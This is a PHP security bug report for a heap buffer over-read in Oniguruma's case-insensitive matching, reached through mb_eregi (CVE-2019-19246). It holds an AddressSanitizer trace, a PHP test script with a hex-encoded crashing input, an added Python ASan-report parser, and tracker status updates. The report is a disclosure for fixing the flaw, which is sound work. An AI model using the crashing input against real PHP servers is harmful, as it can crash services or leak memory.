Headline
CVE-2019-19246: Heap buffer overflow in mb_eregi
Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.
Sec Bug #78559
Heap buffer overflow in mb_eregi
Submitted:
2019-09-18 10:48 UTC
Modified:
2019-09-24 04:50 UTC
From:
Assigned:
stas (profile)
Status:
Closed
Package:
mbstring related
PHP Version:
7.3.9
OS:
Private report:
No
CVE-ID:
None
[2019-09-18 10:48 UTC] [email protected]
Description:
Against libonig 2.9.3 the test script gives:
=================================================================
==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8
READ of size 1 at 0x603000023727 thread T0
    #0 0x184bd61 in str_lower_case_match /home/nikic/libonig/src/regexec.c:4017:11
    #1 0x184bd61 in slow_search_ic /home/nikic/libonig/src/regexec.c:4040:9
    #2 0x184bd61 in forward_search_range /home/nikic/libonig/src/regexec.c:4355:9
    #3 0x18487df in onig_search_with_param /home/nikic/libonig/src/regexec.c:4778:17
    #4 0x1847554 in onig_search /home/nikic/libonig/src/regexec.c:4574:7
    #5 0xa99ad0 in _php_mb_onig_search /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:878:8
    #6 0xa99ad0 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:936:6
    #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2
    #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7
    #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2
    #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18
    #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310
    #15 0x447139 in _start (/home/nikic/php-src-fuzz/sapi/cli/php+0x447139)

0x603000023727 is located 0 bytes to the right of 23-byte region [0x603000023710,0x603000023727)
allocated by thread T0 here:
    #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d)
    #1 0x17f44c0 in set_optimize_exact /home/nikic/libonig/src/regcomp.c:5687:25
    #2 0x17f44c0 in set_optimize_info_from_tree /home/nikic/libonig/src/regcomp.c:5800:11
    #3 0x17f44c0 in onig_compile /home/nikic/libonig/src/regcomp.c:6194:7
    #4 0x1817d6e in onig_new /home/nikic/libonig/src/regcomp.c:6356:7
    #5 0xaa018d in php_mbregex_compile_pattern /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:467:19
    #6 0xa99a48 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:927:7
    #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2
    #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7
    #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2
    #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18
    #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310
Test script:
<?php
$str = "5b5b5b5b5b5b5b492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c52525252525252525252525252525252525252525252525252492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c1cceb04b5d1cceb07a73717e4b1c302c36303030ceb07b7bd2a15c305c30663f436f6e74655c5238416711087b363030302c36303030ceb07b7b7b7b7b7b7b363030302c36303030ceb07b7b7b7b7b7b7b4a01";
// Decode the hex blob; the same bytes serve as both pattern and subject of the case-insensitive match.
$str = hex2bin($str);
var_dump(mb_eregi($str, $str));
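A small triage helper, added here as an example and not part of the bug report, PHP or Oniguruma, that pulls the crash summary a reviewer wants out of an AddressSanitizer report like the one above: the access kind and size, where the access lands relative to the allocated region, the faulting frame, and the real allocation site behind the malloc interceptor. The sample input is an abridged copy of the report's own lines (deeper frames dropped).

```python
import re

# Constructed sample: an abridged copy of the ASan report quoted in the bug report.
ASAN_REPORT = """\
==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8
READ of size 1 at 0x603000023727 thread T0
    #0 0x184bd61 in str_lower_case_match /home/nikic/libonig/src/regexec.c:4017:11
    #1 0x184bd61 in slow_search_ic /home/nikic/libonig/src/regexec.c:4040:9
0x603000023727 is located 0 bytes to the right of 23-byte region [0x603000023710,0x603000023727)
allocated by thread T0 here:
    #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d)
    #1 0x17f44c0 in set_optimize_exact /home/nikic/libonig/src/regcomp.c:5687:25
"""

ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)", re.M)
REGION_RE = re.compile(r"is located (?P<off>\d+) bytes to the (?P<side>left|right) of (?P<len>\d+)-byte region")
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>\S+) (?P<loc>\S+)", re.M)


def parse_asan_report(text):
    """Summarise an ASan heap-buffer-overflow report as a dict.

    Frames before the 'allocated by' marker belong to the faulting stack, frames
    after it to the allocation stack; the first frame of each is the point of interest.
    """
    err, acc, reg = ERROR_RE.search(text), ACCESS_RE.search(text), REGION_RE.search(text)
    if not (err and acc and reg):
        raise ValueError("not a recognised ASan heap-buffer-overflow report")
    head, _, tail = text.partition("allocated by")
    fault_frames = [(m["func"], m["loc"]) for m in FRAME_RE.finditer(head)]
    alloc_frames = [(m["func"], m["loc"]) for m in FRAME_RE.finditer(tail)]
    # Skip the interceptor frame (malloc itself) to reach the caller that owns the buffer.
    alloc_site = next((f for f in alloc_frames if f[0] != "malloc"), None)
    return {
        "kind": err["kind"],
        "access": acc["op"],
        "size": int(acc["size"]),
        "offset": int(reg["off"]),      # distance from the region edge, in bytes
        "side": reg["side"],            # "right" = past the end, "left" = before the start
        "region_len": int(reg["len"]),
        "fault_site": fault_frames[0] if fault_frames else None,
        "alloc_site": alloc_site,
    }
```

For this report the helper yields a 1-byte read 0 bytes past a 23-byte region, faulting in str_lower_case_match on a buffer owned by set_optimize_exact, which is the same picture a reader assembles by hand from the two stacks.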
[2019-09-18 12:11 UTC] [email protected]
It looks like this is already fixed with current oniguruma master.
[2019-09-20 17:05 UTC] [email protected]
-Status: Open
+Status: Analyzed
-Assigned To:
+Assigned To: stas
[2019-09-24 04:51 UTC] [email protected]
-Status: Analyzed
+Status: Closed